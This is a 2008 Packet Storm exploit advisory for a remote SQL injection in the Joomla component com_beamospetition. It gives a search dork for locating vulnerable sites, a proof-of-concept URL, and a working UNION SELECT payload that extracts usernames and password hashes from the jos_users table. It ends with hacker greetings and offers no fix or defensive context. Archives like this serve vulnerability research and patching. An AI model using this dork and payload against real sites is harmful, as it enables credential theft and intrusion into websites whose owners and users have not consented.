joomlabea-sql.txt

2008-06-29T00:00:00
ID PACKETSTORM:67777
Type packetstorm
Reporter His0k4
Modified 2008-06-29T00:00:00

Description

                                        
                                            `/---------------------------------------------------------------\  
\ /  
/ Joomla Component beamospetition Remote SQL injection \  
\ /  
\---------------------------------------------------------------/  
  
  
[*] Author : His0k4 [ALGERIAN HaCkEr]  
  
[*] Dork : inurl:com_beamospetition  
  
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}  
  
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--  
  
----------------------------------------------------------------------------  
[*] Greetings : All friends & muslims HaCkeRs...  
[*] Greetings2: http://www.dz-secure.com  
http://palcastle.org/cc  
  
`